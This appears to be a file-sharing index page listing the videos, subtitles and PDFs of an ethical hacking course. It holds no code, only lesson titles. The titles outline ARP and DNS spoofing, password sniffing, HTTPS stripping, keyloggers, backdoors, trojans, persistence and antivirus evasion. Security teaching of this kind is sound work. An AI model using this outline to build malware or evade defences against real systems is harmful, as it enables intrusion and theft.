Udemy Learn Ethical Hacking From Scratch

mp4   Hot:357   Size:12.12 GB   Created:2021-06-13 05:43:37   Update:2024-09-18 17:27:06  

File List

  • 01 Introduction/001 Introduction-en.srt 7.87 KB
    01 Introduction/002 Teaser-en.srt 9.02 KB
    01 Introduction/003 What is Programming What is Hacking Why Learn Them-en.srt 8.23 KB
    01 Introduction/004 Lab Overview Needed Software-en.srt 4.88 KB
    01 Introduction/004 Virtual-Box-Download-Page.txt 84 B
    01 Introduction/005 How-to-Fix-Blank-Screen-After-Starting-Kali.txt 196 B
    01 Introduction/005 How-to-Fix-Missing-Nat-Network-Issue.txt 88 B
    01 Introduction/005 Installing Kali as a virtual Machine-en.srt 11.24 KB
    01 Introduction/005 Kali-Linux-Download-Page.txt 180 B
    01 Introduction/006 Basic Overview of Kali Linux-en.srt 6.52 KB
    01 Introduction/007 The Terminal Linux Commands-en.srt 13.91 KB
    01 Introduction/008 Python 2 VS Python 3 Writing Our First Program-en.srt 11.48 KB
    01 Introduction/009 Installing Using a Python IDE-en.srt 11.33 KB
    01 Introduction/Lesson 1. Introduction.mp4 141.5 MB
    01 Introduction/Lesson 2. Teaser.mp4 102.01 MB
    01 Introduction/Lesson 3. What is Programming, What is Hacking & Why Learn Them.mp4 139.66 MB
    01 Introduction/Lesson 4. Lab Overview & Needed Software.mp4 57 MB
    01 Introduction/Lesson 5. Installing Kali as a virtual Machine.mp4 104.05 MB
    01 Introduction/Lesson 6. Basic Overview of Kali Linux.mp4 107.44 MB
    01 Introduction/Lesson 7. The Terminal & Linux Commands.mp4 223.49 MB
    01 Introduction/Lesson 8. Python 2 VS Python 3 & Writing Our First Program.mp4 193.68 MB
    01 Introduction/Lesson 9. Installing & Using a Python IDE.mp4 115.46 MB
    02 Writing a MAC Address Changer - Python Basics/010 What is MAC Address How To Change it-en.srt 9.31 KB
    02 Writing a MAC Address Changer - Python Basics/010 mac-changer.pdf 980.54 KB
    02 Writing a MAC Address Changer - Python Basics/011 Subprocess-Module-Documentation.txt 100 B
    02 Writing a MAC Address Changer - Python Basics/011 Using Python Modules Executing System Commands-en.srt 12.33 KB
    02 Writing a MAC Address Changer - Python Basics/012 Implementing a Very Basic MAC Changer-en.srt 6.68 KB
    02 Writing a MAC Address Changer - Python Basics/013 Variables Strings-en.srt 12.35 KB
    02 Writing a MAC Address Changer - Python Basics/014 Using Variables in MAC Changer-en.srt 5.71 KB
    02 Writing a MAC Address Changer - Python Basics/015 Getting Input From The User-en.srt 7.7 KB
    02 Writing a MAC Address Changer - Python Basics/016 Handling User Input-en.srt 11.73 KB
    02 Writing a MAC Address Changer - Python Basics/017 Handling Command-line Arguments-en.srt 11.46 KB
    02 Writing a MAC Address Changer - Python Basics/017 Optparse-Documentation-Page.txt 96 B
    02 Writing a MAC Address Changer - Python Basics/018 Initialising Variables Based on Command-line Arguments-en.srt 9.05 KB
    02 Writing a MAC Address Changer - Python Basics/019 Functions-en.srt 12.1 KB
    02 Writing a MAC Address Changer - Python Basics/020 Returning Values From Functions-en.srt 8.53 KB
    02 Writing a MAC Address Changer - Python Basics/021 Conditional Statements - Theory-en.srt 9.01 KB
    02 Writing a MAC Address Changer - Python Basics/022 Using Conditional Statements in MAC Changer-en.srt 10.94 KB
    02 Writing a MAC Address Changer - Python Basics/Lesson 10. What is MAC Address & How To Change it.mp4 105.32 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 11. Using Python Modules & Executing System Commands.mp4 21.61 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 12. Implementing a Very Basic MAC Changer.mp4 9.35 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 13. Variables & Strings.mp4 19.48 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 14. Using Variables in MAC Changer.mp4 9.12 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 15. Getting Input From The User.mp4 12.25 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 16. Handling User Input.mp4 15.18 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 17. Handling Command-line Arguments.mp4 18.02 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 18. Initialising Variables Based on Command-line Arguments.mp4 12.19 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 19. Functions.mp4 22.49 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 20. Returning Values From Functions.mp4 10.72 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 21. Decision Making - Theory.mp4 16.7 MB
    02 Writing a MAC Address Changer - Python Basics/Lesson 22. Using Conditional Statements in MAC Changer.mp4 19.98 MB
    03 MAC Changer - Algorithm Design/023 What is an Algorithm-en.srt 4.53 KB
    03 MAC Changer - Algorithm Design/024 Check-call-Manuall-Page.txt 100 B
    03 MAC Changer - Algorithm Design/024 Reading Output Returned By System Commands-en.srt 8.39 KB
    03 MAC Changer - Algorithm Design/025 Pythex.org.txt 40 B
    03 MAC Changer - Algorithm Design/025 Regular Expressions (Regex)-en.srt 10.5 KB
    03 MAC Changer - Algorithm Design/026 Extracting a Substring Using Regex-en.srt 8.15 KB
    03 MAC Changer - Algorithm Design/026 Re-Module-Manual-Page.txt 84 B
    03 MAC Changer - Algorithm Design/027 Refactoring Housekeeping-en.srt 15.14 KB
    03 MAC Changer - Algorithm Design/028 Implementing The Algorithm to Check The Mac Did Change-en.srt 8.23 KB
    03 MAC Changer - Algorithm Design/Lesson 23. What is an Algorithm.mp4 7.03 MB
    03 MAC Changer - Algorithm Design/Lesson 24. Reading Output Returned By System Commands.mp4 14.5 MB
    03 MAC Changer - Algorithm Design/Lesson 25. Regular Expressions (Regex).mp4 18.04 MB
    03 MAC Changer - Algorithm Design/Lesson 26. Extracting a Substring Using Regex.mp4 15.8 MB
    03 MAC Changer - Algorithm Design/Lesson 27. Refactoring & Housekeeping.mp4 17.64 MB
    03 MAC Changer - Algorithm Design/Lesson 28. Implementing The Algorithm to Check The Mac Did Change.mp4 12.73 MB
    04 Programming a Network Scanner/029 ADAPTER-LINKS-ADAPTER-LINKS.txt 36 B
    04 Programming a Network Scanner/029 Introduction Teaser-en.srt 12.37 KB
    04 Programming a Network Scanner/029 network-scanner.pdf 719.09 KB
    04 Programming a Network Scanner/030 Installing Windows as a Virtual Machine-en.srt 4.78 KB
    04 Programming a Network Scanner/031 What is ARP What its Used For-en.srt 11.9 KB
    04 Programming a Network Scanner/032 Designing an Algorithm To Discover Clients Connected To The Same Network-en.srt 4.99 KB
    04 Programming a Network Scanner/033 Scapy-Documentation.txt 96 B
    04 Programming a Network Scanner/033 Using Scapy To Create an ARP Request-en.srt 8.39 KB
    04 Programming a Network Scanner/034 Combining Frames To Broadcast Packets-en.srt 11.21 KB
    04 Programming a Network Scanner/035 Scapy-Documentation.txt 96 B
    04 Programming a Network Scanner/035 Sending Receiving Packets-en.srt 9.06 KB
    04 Programming a Network Scanner/036 Lists-en.srt 10.74 KB
    04 Programming a Network Scanner/036 More-info-about-python-lists.txt 110 B
    04 Programming a Network Scanner/037 Iterating Over Lists Analysing Packet-en.srt 12.73 KB
    04 Programming a Network Scanner/038 Using Escape Characters To Enhance Program Output-en.srt 8.13 KB
    04 Programming a Network Scanner/039 Dictionaries-en.srt 12.82 KB
    04 Programming a Network Scanner/040 Improving the Program Using a List of Dictionaries-en.srt 11.42 KB
    04 Programming a Network Scanner/040 More-info-about-python-dictionaries.txt 120 B
    04 Programming a Network Scanner/041 Refactoring Housekeeping-en.srt 9.3 KB
    04 Programming a Network Scanner/042 Python 3 Compatibility-en.srt 9.32 KB
    04 Programming a Network Scanner/Lesson 29. Introduction & Teaser.mp4 109.63 MB
    04 Programming a Network Scanner/Lesson 30. Installing Windows as a Virtual Machine.mp4 60.59 MB
    04 Programming a Network Scanner/Lesson 31. What is ARP & What its Used For.mp4 16.58 MB
    04 Programming a Network Scanner/Lesson 32. Designing an Algorithm To Discover Clients Connected To The Same Network.mp4 11.89 MB
    04 Programming a Network Scanner/Lesson 33. Using Scapy To Create an ARP Request.mp4 11.6 MB
    04 Programming a Network Scanner/Lesson 34. Combining Frames To Broadcast Packets.mp4 21.18 MB
    04 Programming a Network Scanner/Lesson 35. Sending & Receiving Packets.mp4 10.74 MB
    04 Programming a Network Scanner/Lesson 36. Lists.mp4 19.09 MB
    04 Programming a Network Scanner/Lesson 37. Iterating Over Lists & Analysing Packet.mp4 18.36 MB
    04 Programming a Network Scanner/Lesson 38. Using Escape Characters To Enhance Program Output.mp4 11.04 MB
    04 Programming a Network Scanner/Lesson 39. Dictionaries.mp4 15.28 MB
    04 Programming a Network Scanner/Lesson 40. Improving the Program Using a List of Dictionaries.mp4 14.78 MB
    04 Programming a Network Scanner/Lesson 41. Refactoring & Housekeeping.mp4 12.56 MB
    04 Programming a Network Scanner/Lesson 42. Python 3 Compatibility.mp4 12.69 MB
    05 Writing an ARP Spoofer/043 What is ARP Spoofing-en.srt 6.95 KB
    05 Writing an ARP Spoofer/043 arp-spoof.pdf 709.19 KB
    05 Writing an ARP Spoofer/044 Redirecting the Flow of Packets in a Network Using arpspoof-en.srt 6.09 KB
    05 Writing an ARP Spoofer/045 Creating an ARP Response-en.srt 8.78 KB
    05 Writing an ARP Spoofer/046 Sending ARP Responses-en.srt 7 KB
    05 Writing an ARP Spoofer/047 Extracting MAC Address From Responses-en.srt 8.3 KB
    05 Writing an ARP Spoofer/048 Loops-en.srt 11.1 KB
    05 Writing an ARP Spoofer/049 Using an Infinite Loop To Prominently Redirect Packets-en.srt 10.74 KB
    05 Writing an ARP Spoofer/050 Dynamic Printing-en.srt 8.73 KB
    05 Writing an ARP Spoofer/051 Handling Exceptions-en.srt 6.83 KB
    05 Writing an ARP Spoofer/052 Implementing a Restore Function-en.srt 14.63 KB
    05 Writing an ARP Spoofer/053 Restoring ARP Tables When an Exception Occures-en.srt 6.28 KB
    05 Writing an ARP Spoofer/Lesson 43. What is ARP Spoofing.mp4 112.24 MB
    05 Writing an ARP Spoofer/Lesson 44. Redirecting the Flow of Packets in a Network Using arpspoof.mp4 56.99 MB
    05 Writing an ARP Spoofer/Lesson 45. Creating an ARP Response.mp4 10.56 MB
    05 Writing an ARP Spoofer/Lesson 46. Sending ARP Responses.mp4 9.02 MB
    05 Writing an ARP Spoofer/Lesson 47. Extracting MAC Address From Responses.mp4 10.92 MB
    05 Writing an ARP Spoofer/Lesson 48. Loops.mp4 16.76 MB
    05 Writing an ARP Spoofer/Lesson 49. Using an Infinite Loop To Prominently Redirect Packets.mp4 11.61 MB
    05 Writing an ARP Spoofer/Lesson 50. Dynamic Printing.mp4 10.1 MB
    05 Writing an ARP Spoofer/Lesson 51. Handling Exceptions.mp4 7.8 MB
    05 Writing an ARP Spoofer/Lesson 52. Implementing a Restore Function.mp4 20.5 MB
    05 Writing an ARP Spoofer/Lesson 53. Restoring ARP Tables When an Exception Occures.mp4 9.29 MB
    06 Writing a Packet Sniffer/054 Introduction Teaser-en.srt 6.11 KB
    06 Writing a Packet Sniffer/054 Sniffer.pdf 556.34 KB
    06 Writing a Packet Sniffer/055 Sniffing Packets Using Scapy-en.srt 9.97 KB
    06 Writing a Packet Sniffer/056 Berkeley-Packet-Filter-BPF-syntax.txt 68 B
    06 Writing a Packet Sniffer/056 Extracting data From a Specific Layer-en.srt 8.21 KB
    06 Writing a Packet Sniffer/056 Scapy-http-Git-Repo.txt 82 B
    06 Writing a Packet Sniffer/057 Analysing Sniffed Packets Extracting Fields From Layers-en.srt 13.79 KB
    06 Writing a Packet Sniffer/058 Analysing Fields Extracting Passwords-en.srt 13.79 KB
    06 Writing a Packet Sniffer/059 Extracting URLs-en.srt 9.15 KB
    06 Writing a Packet Sniffer/060 Capturing Passwords From Any Computer Connected to the Same Network-en.srt 9.49 KB
    06 Writing a Packet Sniffer/Lesson 54. Introduction & Teaser.mp4 85.79 MB
    06 Writing a Packet Sniffer/Lesson 55. Sniffing Packets Using Scapy.mp4 11.83 MB
    06 Writing a Packet Sniffer/Lesson 56. Extracting data From a Specific Layer.mp4 16.37 MB
    06 Writing a Packet Sniffer/Lesson 57. Analysing Sniffed Packets & Extracting Fields From Layers.mp4 28.98 MB
    06 Writing a Packet Sniffer/Lesson 58. Analysing Fields & Extracting Passwords.mp4 21.17 MB
    06 Writing a Packet Sniffer/Lesson 59. Extracting URLs.mp4 20.38 MB
    06 Writing a Packet Sniffer/Lesson 60. Capturing Passwords From Any Computer Connected to the Same Network.mp4 15.15 MB
    07 Writing a DNS Spoofer/061 Intercepting Packets - Creating a Proxy-en.srt 16.12 KB
    07 Writing a DNS Spoofer/061 interceptor.pdf 1.81 MB
    07 Writing a DNS Spoofer/062 Converting Packets to Scapy Packets-en.srt 10.63 KB
    07 Writing a DNS Spoofer/063 What is DNS Spoofing-en.srt 8.52 KB
    07 Writing a DNS Spoofer/064 Analysing DNS Responses-en.srt 7.92 KB
    07 Writing a DNS Spoofer/065 Crafting a Custom DNS Response-en.srt 9.78 KB
    07 Writing a DNS Spoofer/066 Modifying Packets On The Fly-en.srt 9.44 KB
    07 Writing a DNS Spoofer/067 Redirecting DNS Responses-en.srt 6.71 KB
    07 Writing a DNS Spoofer/Lesson 61. Intercepting Packets - Creating a Proxy.mp4 155.19 MB
    07 Writing a DNS Spoofer/Lesson 62. Converting Packets to Scapy Packets.mp4 83.93 MB
    07 Writing a DNS Spoofer/Lesson 63. What is DNS Spoofing.mp4 123.57 MB
    07 Writing a DNS Spoofer/Lesson 64. Analysing DNS Responses.mp4 70.56 MB
    07 Writing a DNS Spoofer/Lesson 65. Crafting a Custom DNS Response.mp4 79.84 MB
    07 Writing a DNS Spoofer/Lesson 66. Modifying Packets On The Fly.mp4 86.85 MB
    07 Writing a DNS Spoofer/Lesson 67. Redirecting DNS Responses.mp4 60.96 MB
    08 Writing a File Interceptor/068 Introduction Teaser-en.srt 5.47 KB
    08 Writing a File Interceptor/069 Filtering Traffic Based on the Port Used-en.srt 10.74 KB
    08 Writing a File Interceptor/070 Analysing HTTP Requests-en.srt 6.78 KB
    08 Writing a File Interceptor/071 Modifying HTTP Requests on the Fly-en.srt 11.81 KB
    08 Writing a File Interceptor/072 Replacing HTTP Requests-en.srt 12.58 KB
    08 Writing a File Interceptor/073 Intercepting Replacing Downloads on The Network-en.srt 11.34 KB
    08 Writing a File Interceptor/Lesson 68. Introduction & Teaser.mp4 72.99 MB
    08 Writing a File Interceptor/Lesson 69. Filtering Traffic Based on the Port Used.mp4 93.17 MB
    08 Writing a File Interceptor/Lesson 70. Analysing HTTP Requests.mp4 55.62 MB
    08 Writing a File Interceptor/Lesson 71. Modifying HTTP Requests on the Fly.mp4 104.22 MB
    08 Writing a File Interceptor/Lesson 72. Replacing HTTP Requests.mp4 102.69 MB
    08 Writing a File Interceptor/Lesson 73. Intercepting & Replacing Downloads on The Network.mp4 100.47 MB
    09 Writing a Code Injector/074 Introduction Teaser-en.srt 1.65 KB
    09 Writing a Code Injector/075 Analysing HTTP Responses-en.srt 8.24 KB
    09 Writing a Code Injector/076 Replacing a Substring Using Regex-en.srt 8.21 KB
    09 Writing a Code Injector/077 Decoding HTTP Responses-en.srt 11.77 KB
    09 Writing a Code Injector/078 Modifying HTTP Responses Injecting Javascript Code in HTML Pages-en.srt 10.2 KB
    09 Writing a Code Injector/079 Refactoring Housekeeping-en.srt 10.77 KB
    09 Writing a Code Injector/080 Debugging Issues-en.srt 7.57 KB
    09 Writing a Code Injector/081 Using Groups None-capturing Regex-en.srt 10.87 KB
    09 Writing a Code Injector/082 Recalculating Content Length-en.srt 13.13 KB
    09 Writing a Code Injector/083 BeEF Overview Basic Hook Method-en.srt 8.14 KB
    09 Writing a Code Injector/084 Hooking Computers Using code_injector-en.srt 7.02 KB
    09 Writing a Code Injector/085 Basic BeEF Commands-en.srt 6 KB
    09 Writing a Code Injector/086 Delivering Malware Using BeEF-en.srt 7.5 KB
    09 Writing a Code Injector/Lesson 74. Introduction & Teaser.mp4 30.14 MB
    09 Writing a Code Injector/Lesson 75. Analysing HTTP Responses.mp4 77.92 MB
    09 Writing a Code Injector/Lesson 76. Replacing a Substring Using Regex.mp4 64.7 MB
    09 Writing a Code Injector/Lesson 77. Decoding HTTP Responses.mp4 104.26 MB
    09 Writing a Code Injector/Lesson 78. Modifying HTTP Responses & Injecting Javascript Code in HTML Pages.mp4 113.09 MB
    09 Writing a Code Injector/Lesson 79. Refactoring & Housekeeping.mp4 79.06 MB
    09 Writing a Code Injector/Lesson 80. Debugging Issues.mp4 75.34 MB
    09 Writing a Code Injector/Lesson 81. Using Groups & None-capturing Regex.mp4 93.05 MB
    09 Writing a Code Injector/Lesson 82. Recalculating Content Length.mp4 124.42 MB
    09 Writing a Code Injector/Lesson 83. BeEF Overview & Basic Hook Method.mp4 107.35 MB
    09 Writing a Code Injector/Lesson 84. Hooking Computers Using code_injector.mp4 48.48 MB
    09 Writing a Code Injector/Lesson 85. Basic BeEF Commands.mp4 52.94 MB
    09 Writing a Code Injector/Lesson 86. Delivering Malware Using BeEF.mp4 69.99 MB
    10 Bypassing HTTPS/087 How to Bypass HTTPS-en.srt 12.88 KB
    10 Bypassing HTTPS/087 Moxie-explaining-how-SSLstrip-works.txt 104 B
    10 Bypassing HTTPS/088 Bypassing HTTPS Sniffing Login Credentials-en.srt 9.74 KB
    10 Bypassing HTTPS/089 Replacing Downloads on HTTPS Pages-en.srt 12.95 KB
    10 Bypassing HTTPS/090 Injecting Code in HTTPS Pages-en.srt 9.82 KB
    10 Bypassing HTTPS/Lesson 87. How to Bypass HTTPS.mp4 163.68 MB
    10 Bypassing HTTPS/Lesson 88. Bypassing HTTPS & Sniffing Login Credentials.mp4 67.74 MB
    10 Bypassing HTTPS/Lesson 89. Replacing Downloads on HTTPS Pages.mp4 115.94 MB
    10 Bypassing HTTPS/Lesson 90. Injecting Code in HTTPS Pages.mp4 100.22 MB
    11 Writing an ARP Spoof Detector/091 Running Python Programs on Windows-en.srt 12.37 KB
    11 Writing an ARP Spoof Detector/092 Capturing Analysing ARP Responses-en.srt 7.98 KB
    11 Writing an ARP Spoof Detector/093 Detecting ARP Spoofing Attacks-en.srt 8.99 KB
    11 Writing an ARP Spoof Detector/Lesson 91. Running Python Programs on Windows.mp4 106.8 MB
    11 Writing an ARP Spoof Detector/Lesson 92. Capturing & Analysing ARP Responses.mp4 55.59 MB
    11 Writing an ARP Spoof Detector/Lesson 93. Detecting ARP Spoofing Attacks.mp4 67.81 MB
    12 Writing Malware/094 Evil-Files.pdf 1.34 MB
    12 Writing Malware/094 Introduction Teaser-en.srt 2.35 KB
    12 Writing Malware/095 Execute System Command Payload-en.srt 11.99 KB
    12 Writing Malware/096 Sending Reports By Email-en.srt 13.63 KB
    12 Writing Malware/097 Filtering Command Output Using Regex-en.srt 12.71 KB
    12 Writing Malware/098 Stealing WiFi Passwords Saved on a Computer-en.srt 12.1 KB
    12 Writing Malware/099 Downloading Files From Program-en.srt 9.97 KB
    12 Writing Malware/100 File-Modes-In-Python.txt 116 B
    12 Writing Malware/100 Writing Files on Disk-en.srt 14.17 KB
    12 Writing Malware/101 LaZagne-Git-Repo.txt 96 B
    12 Writing Malware/101 Password Recovery Basics-en.srt 10.78 KB
    12 Writing Malware/102 Using all the Above to Steal Saved Passwords Remotely-en.srt 10.1 KB
    12 Writing Malware/103 Interacting With The File System-en.srt 12.15 KB
    12 Writing Malware/103 OS-Library-Documentation.txt 84 B
    12 Writing Malware/Lesson 100. Writing Files on Disk.mp4 69.1 MB
    12 Writing Malware/Lesson 101. Password Recovery Basics.mp4 93.72 MB
    12 Writing Malware/Lesson 102. Using all the Above to Steal Saved Passwords Remotely.mp4 62.79 MB
    12 Writing Malware/Lesson 103. Interacting With The File System.mp4 76.9 MB
    12 Writing Malware/Lesson 94. Introduction & Teaser.mp4 44.09 MB
    12 Writing Malware/Lesson 95. Execute System Command Payload.mp4 91.27 MB
    12 Writing Malware/Lesson 96. Sending Reports By Email.mp4 89.92 MB
    12 Writing Malware/Lesson 97. Filtering Command Output Using Regex.mp4 90.59 MB
    12 Writing Malware/Lesson 98. Stealing WiFi Passwords Saved on a Computer.mp4 118.43 MB
    12 Writing Malware/Lesson 99. Downloading Files From Program.mp4 89.62 MB
    13 Writing Malware - Keylogger/104 Introduction Teaser-en.srt 4.55 KB
    13 Writing Malware - Keylogger/105 Pynput-Documentation.txt 66 B
    13 Writing Malware - Keylogger/105 Writing a Basic Local Keylogger-en.srt 13.09 KB
    13 Writing Malware - Keylogger/106 Global Variables-en.srt 10.25 KB
    13 Writing Malware - Keylogger/107 Logging Special Keys-en.srt 8.23 KB
    13 Writing Malware - Keylogger/108 Threading Recursion-en.srt 13.51 KB
    13 Writing Malware - Keylogger/109 OOP - Object Oriented Programming Basics-en.srt 18.93 KB
    13 Writing Malware - Keylogger/110 Constructor Methods Instance Variables-en.srt 9.41 KB
    13 Writing Malware - Keylogger/111 Logging Key-strikes and Reporting Them By Email-en.srt 14.59 KB
    13 Writing Malware - Keylogger/Lesson 104. Introduction & Teaser.mp4 63.19 MB
    13 Writing Malware - Keylogger/Lesson 105. Writing a Basic Local Keylogger.mp4 78.3 MB
    13 Writing Malware - Keylogger/Lesson 106. Global Variables.mp4 54.79 MB
    13 Writing Malware - Keylogger/Lesson 107. Logging Special Keys.mp4 54.93 MB
    13 Writing Malware - Keylogger/Lesson 108. Threading & Recursion.mp4 84.42 MB
    13 Writing Malware - Keylogger/Lesson 109. OOP - Object Oriented Programming Basics.mp4 116.48 MB
    13 Writing Malware - Keylogger/Lesson 110. Constructor Methods & Instance Variables.mp4 66.13 MB
    13 Writing Malware - Keylogger/Lesson 111. Logging Key-strikes and Reporting Them By Email.mp4 83.79 MB
    14 Writing Malware - Backdoors/112 Introduction Teaser-en.srt 7.28 KB
    14 Writing Malware - Backdoors/113 Client - Server Communication Connection Types-en.srt 9.95 KB
    14 Writing Malware - Backdoors/114 Connecting Two Remote Computers Using Sockets-en.srt 12.9 KB
    14 Writing Malware - Backdoors/114 Sockets-Official-Documentation.txt 92 B
    14 Writing Malware - Backdoors/114 Tutorials-Point-Socket-Documentation.txt 120 B
    14 Writing Malware - Backdoors/115 Sending Receiving Data Over TCP-en.srt 6.41 KB
    14 Writing Malware - Backdoors/116 Executing System Commands Remotely-en.srt 12.22 KB
    14 Writing Malware - Backdoors/117 Implementing a Server-en.srt 10.54 KB
    14 Writing Malware - Backdoors/118 Implementing Skeleton For Server - Client Communication-en.srt 8.56 KB
    14 Writing Malware - Backdoors/119 Refactoring - Creating a Listener Class-en.srt 9.54 KB
    14 Writing Malware - Backdoors/120 Refactoring - Creating a Backdoor Class-en.srt 6.82 KB
    14 Writing Malware - Backdoors/121 Serialisation - Theory-en.srt 13.68 KB
    14 Writing Malware - Backdoors/122 Serialisation - Implementing Reliable Methods to Send Receive Data Over TCP-en.srt 9.37 KB
    14 Writing Malware - Backdoors/123 Serialisation - Reliably Sending Receiving Data-en.srt 7.22 KB
    14 Writing Malware - Backdoors/124 Sending Commands as List Implementing Exit Command-en.srt 10.01 KB
    14 Writing Malware - Backdoors/125 Interacting With the File System - Implementing cd Command-en.srt 10.66 KB
    14 Writing Malware - Backdoors/126 Reading Files-en.srt 8.9 KB
    14 Writing Malware - Backdoors/127 Writing Files-en.srt 8.07 KB
    14 Writing Malware - Backdoors/128 Downloading Files From Hacked Computer-en.srt 8.28 KB
    14 Writing Malware - Backdoors/129 Implementing Upload Functionality in Listener-en.srt 8.94 KB
    14 Writing Malware - Backdoors/130 Implementing Upload Functionality in Backdoor-en.srt 7.12 KB
    14 Writing Malware - Backdoors/131 Handling Unknown Exceptions-en.srt 11.55 KB
    14 Writing Malware - Backdoors/132 Using the Backdoor to Hack Windows Linux OS X-en.srt 14.78 KB
    14 Writing Malware - Backdoors/Lesson 112. Introduction & Teaser.mp4 76.63 MB
    14 Writing Malware - Backdoors/Lesson 113. Client - Server Communication & Connection Types.mp4 120.14 MB
    14 Writing Malware - Backdoors/Lesson 114. Connecting Two Remote Computers Using Sockets.mp4 66.79 MB
    14 Writing Malware - Backdoors/Lesson 115. Sending & Receiving Data Over TCP.mp4 32.14 MB
    14 Writing Malware - Backdoors/Lesson 116. Executing System Commands Remotely.mp4 73.3 MB
    14 Writing Malware - Backdoors/Lesson 117. Implementing a Server.mp4 52.47 MB
    14 Writing Malware - Backdoors/Lesson 118. Implementing Skeleton For Server - Client Communication.mp4 54.78 MB
    14 Writing Malware - Backdoors/Lesson 119. Refactoring - Creating a Listener Class.mp4 71.87 MB
    14 Writing Malware - Backdoors/Lesson 120. Refactoring - Creating a Backdoor Class.mp4 43.41 MB
    14 Writing Malware - Backdoors/Lesson 121. Serialisation - Theory.mp4 164.44 MB
    14 Writing Malware - Backdoors/Lesson 122. Serialisation - Implementing Reliable Methods to Send & Receive Data Over TCP.mp4 81.88 MB
    14 Writing Malware - Backdoors/Lesson 123. Serialisation - Reliably Sending & Receiving Data.mp4 58.96 MB
    14 Writing Malware - Backdoors/Lesson 124. Sending Commands as List & Implementing Exit Command.mp4 73.14 MB
    14 Writing Malware - Backdoors/Lesson 125. Interacting With the File System - Implementing cd Command.mp4 77.77 MB
    14 Writing Malware - Backdoors/Lesson 126. Reading Files.mp4 73.85 MB
    14 Writing Malware - Backdoors/Lesson 127. Writing Files.mp4 56.67 MB
    14 Writing Malware - Backdoors/Lesson 128. Downloading Files From Hacked Computer.mp4 77.29 MB
    14 Writing Malware - Backdoors/Lesson 129. Implementing Upload Functionality in Listener.mp4 97.87 MB
    14 Writing Malware - Backdoors/Lesson 130. Implementing Upload Functionality in Backdoor.mp4 61.67 MB
    14 Writing Malware - Backdoors/Lesson 131. Handling Unknown Exceptions.mp4 97.84 MB
    14 Writing Malware - Backdoors/Lesson 132. Using the Backdoor to Hack Windows, Linux & OS X.mp4 126.99 MB
    15 Writing Malware - Packaging/133 Introduction Teaser-en.srt 4.1 KB
    15 Writing Malware - Packaging/134 Converting Python Programs To Windows Binary Executables-en.srt 8.24 KB
    15 Writing Malware - Packaging/135 Running Executables Silentely-en.srt 8.29 KB
    15 Writing Malware - Packaging/136 Installing Windows Pyinstaller on Linux-en.srt 9.06 KB
    15 Writing Malware - Packaging/137 Packaging Programs For Windows From Linux-en.srt 10.04 KB
    15 Writing Malware - Packaging/138 Persistence Idea-en.srt 9.75 KB
    15 Writing Malware - Packaging/139 Python-OS-Library-Documentation.txt 84 B
    15 Writing Malware - Packaging/139 Python-Shutil-Library-Documentation.txt 92 B
    15 Writing Malware - Packaging/139 Running Programs on Startup-en.srt 16.82 KB
    15 Writing Malware - Packaging/140 Creating a Basic Trojan Using Download Execute Payload-en.srt 13.14 KB
    15 Writing Malware - Packaging/141 Creating a Trojan By Embedding Files In Program Code-en.srt 9.95 KB
    15 Writing Malware - Packaging/141 Pyinstaller-Documentation.txt 120 B
    15 Writing Malware - Packaging/142 Bypassing Anti-Virus Programs - Theory-en.srt 6.58 KB
    15 Writing Malware - Packaging/143 Bypassing Anti-Virus Programs - Practical-en.srt 10.53 KB
    15 Writing Malware - Packaging/144 Adding an Icons to Generated Executables-en.srt 5.99 KB
    15 Writing Malware - Packaging/144 Easyicon-a-website-to-convert-images-to-icons.txt 90 B
    15 Writing Malware - Packaging/144 Iconfinder-a-website-to-download-icons.txt 56 B
    15 Writing Malware - Packaging/145 Spoofing File Extension-en.srt 10.8 KB
    15 Writing Malware - Packaging/146 Converting Python Programs To OS X Executables-en.srt 10.73 KB
    15 Writing Malware - Packaging/147 Converting Python Programs to Linux Executables-en.srt 9.65 KB
    15 Writing Malware - Packaging/Lesson 133. Introduction & Teaser.mp4 68.27 MB
    15 Writing Malware - Packaging/Lesson 134. Converting Python Programs To Windows Binary Executables.mp4 82.04 MB
    15 Writing Malware - Packaging/Lesson 135. Running Executables Silentely.mp4 66.54 MB
    15 Writing Malware - Packaging/Lesson 136. Installing Windows Pyinstaller on Linux.mp4 67.22 MB
    15 Writing Malware - Packaging/Lesson 137. Packaging Programs For Windows From Linux.mp4 58.22 MB
    15 Writing Malware - Packaging/Lesson 138. Persistence Idea.mp4 104.42 MB
    15 Writing Malware - Packaging/Lesson 139. Running Programs on Startup.mp4 119.02 MB
    15 Writing Malware - Packaging/Lesson 140. Creating a Basic Trojan Using Download & Execute Payload.mp4 94.54 MB
    15 Writing Malware - Packaging/Lesson 141. Creating a Trojan By Embedding Files In Program Code.mp4 61.52 MB
    15 Writing Malware - Packaging/Lesson 142. Bypassing Anti-Virus Programs - Theory.mp4 81.2 MB
    15 Writing Malware - Packaging/Lesson 143. Bypassing Anti-Virus Programs - Practical.mp4 81.37 MB
    15 Writing Malware - Packaging/Lesson 144. Adding an Icons to Generated Executables.mp4 44.43 MB
    15 Writing Malware - Packaging/Lesson 145. Spoofing File Extension.mp4 146.11 MB
    15 Writing Malware - Packaging/Lesson 146. Converting Python Programs To OS X Executables.mp4 103.51 MB
    15 Writing Malware - Packaging/Lesson 147. Converting Python Programs to Linux Executables.mp4 61.71 MB
    16 Website Web Application Hacking/148 Introduction Teaser-en.srt 8.95 KB
    16 Website Web Application Hacking/148 Website-Hacking.pdf 346.3 KB
    16 Website Web Application Hacking/149 What is a Website-en.srt 5.42 KB
    16 Website Web Application Hacking/150 How to Hack a Website-en.srt 7.88 KB
    16 Website Web Application Hacking/151 Sending GET Requests To Web Servers-en.srt 11.46 KB
    16 Website Web Application Hacking/Lesson 148. Introduction & Teaser.mp4 136.43 MB
    16 Website Web Application Hacking/Lesson 149. What is a Website.mp4 86 MB
    16 Website Web Application Hacking/Lesson 150. How to Hack a Website.mp4 103.13 MB
    17 Website Hacking - Writing a Crawler/152 Discovering Subdomains-en.srt 12.61 KB
